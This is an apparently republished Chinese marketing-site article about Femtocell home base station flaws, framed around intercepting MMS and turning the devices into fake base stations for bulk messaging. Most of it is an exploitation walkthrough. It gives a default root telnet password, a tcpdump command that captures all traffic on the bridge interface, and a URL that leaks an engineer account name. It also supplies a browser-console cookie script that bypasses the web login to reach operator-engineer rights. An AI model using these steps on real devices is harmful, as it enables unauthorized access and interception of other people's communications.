家庭基站Femtocell截获任意彩信漏洞,危及公众移动通信安全
发布时间 :2015-11-23
来源 : 121营销平台
移动互联网发展到帐用户对彩信、通话、数据流需求剧增,转向互动任意彩信需求,而Femtocell设备可以被改造成伪基站彩信群发器,截取家庭任意彩信隐私,移动彩信安全通信漏洞凸显。
近日,有部分运营商通报Femtocell虽能瞬间解决室内ip网络覆盖问题,但是漏洞问题百出,很多厂家已经对全网设备进行紧急修复,漏洞暂时已经修复完成,但是漏洞问题还会存在吗?
121营销揭秘Femtocell任意漏洞三大细节:
①root弱密码
可以直接telnet登录,然后就是一个拥有root权限的Linux shell了。
$ telnet 192.168.197.1
login: root
password: 5up
顺便提一句,这个密码应该是Atheros的参考设计板PB44的默认密码,很多厂商拿来都不改。在搜索引擎上以"5up"和"root"为关键词,可以搜索到不少有趣的东西。
并且发现上面的busybox基本没有裁剪,甚至连tcpdump功能都有。
于是,可以直接抓取到所有连上此WiFi的流量:
busybox tcpdump -i br0 not port 23
② 其它利用方式
/mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
闪灯 /mnt/flash/led_ctrl.sh [on|off]
③ RF 板卡渗透:Web 登录绕过
访问 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 获得用户名为
abmoc@24320
然后在USER.js里发现原有的登录绕过问题没有得到修复,于是在浏览器中打开Console,输入以下脚本即可登录:
SetCookie('role', 'marketUser');
SetCookie('username', 'abmoc@24320');
SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
document.cookie = "loginFlag=1;";
window.top.location = 'main.asp?r=' + Math.random() + '#index';
登录之后,我们就拥有了与运营商派过来开站的工程师完全一样的操作权限!
推荐阅读
- 伪基站发送彩信详细介绍 2016-06-13
- 拒收伪基站垃圾彩信内容,可选择更换4G USI 2015-04-14
- 伪基站群发商业彩信,移动用户通信中断 2015-03-26
- 冬季取暖设施增多 供电局发送彩信提醒用电 2013-10-25
最新阅读
- 彩信群发有助于销售吗 2022-06-09
- 彩信群发哪家比较靠谱 2022-04-24
- 手机彩信群发推广效果怎么 2022-04-07
- 发送彩信营销怎么效果好 2022-03-08
- 彩信营销平台群发需不需要营业执照 2022-02-23
- 什么公司最需要彩信群发 2022-02-15